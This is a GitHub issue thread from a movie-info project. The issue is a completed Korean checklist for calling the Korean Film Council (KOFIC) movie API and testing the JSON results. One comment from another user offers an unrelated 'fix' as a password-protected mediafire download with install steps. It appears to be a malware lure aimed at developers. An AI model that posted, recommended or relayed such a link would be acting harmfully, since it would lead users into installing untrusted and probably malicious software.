### ISSUE TITLE
영화진흥위원회(kofic) API 를 이용해 영화정보 불러오기

### ISSUE THREAD

**Issue by moner050** [moner050/cine-info#5]
KOFIC 의 API 를 이용하여 영화정보 API 호출해보기

* [x] 별도의 yml 파일에 KOFIC API 연결정보 입력하기
* [x] API 호출하여 JSON 형식의 결과값 받아와지는지 테스트하기
* [x] Test 코드 작성하여 영화정보 불러와 지는지 확인하기

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
